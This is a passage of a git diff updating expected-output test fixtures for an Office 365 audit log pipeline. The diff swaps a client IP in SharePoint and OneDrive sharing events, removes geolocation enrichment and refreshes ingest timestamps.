76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:45", "EventData": "\u003cPermissions granted\u003eContribute\u003c/Permissions granted\u003e", @@ -243,10 +243,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:44", "EventData": "\u003cPermissions granted\u003eLimited Access\u003c/Permissions granted\u003e", @@ -277,10 +277,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:44", "EventData": "\u003cPermissions granted\u003eSystem.LimitedEdit\u003c/Permissions granted\u003e", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json index 2d6c639ee8b..c2765e337eb 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json @@ -43,7 +43,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229349700Z", + "ingested": "2021-12-09T13:42:49.545726200Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Members\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"4d1a6a2b-360c-423d-96e5-08d7b3cacd83\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"Everyone except external users\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -115,7 +115,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229356800Z", + "ingested": "2021-12-09T13:42:49.545736200Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"56696ec0-5a7e-4561-5e88-08d7b3cacd4a\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SHAREPOINT\\\\system\",\"TargetUserOrGroupType\":\"Member\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -187,7 +187,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229358900Z", + "ingested": "2021-12-09T13:42:49.545741900Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"b8c880ff-e8fe-407c-9ce9-08d7b3cacd07\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SIEMTest Owners\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -259,7 +259,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229361100Z", + "ingested": "2021-12-09T13:42:49.545747700Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Members\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"483f657f-9141-45fc-b141-08d7b3caccfb\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SIEMTest Members\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -331,7 +331,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229363Z", + "ingested": "2021-12-09T13:42:49.545752500Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:49\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"13004a30-d15a-48a5-16ec-08d7b3caccc0\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SHAREPOINT\\\\system\",\"TargetUserOrGroupType\":\"Member\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -362,25 +362,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -417,7 +399,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -429,12 +411,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229364700Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545757200Z", + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", @@ -470,25 +452,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -529,7 +493,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -541,12 +505,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229366400Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545762400Z", + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", @@ -582,25 +546,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -642,7 +588,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -654,12 +600,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229368300Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545766900Z", + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": 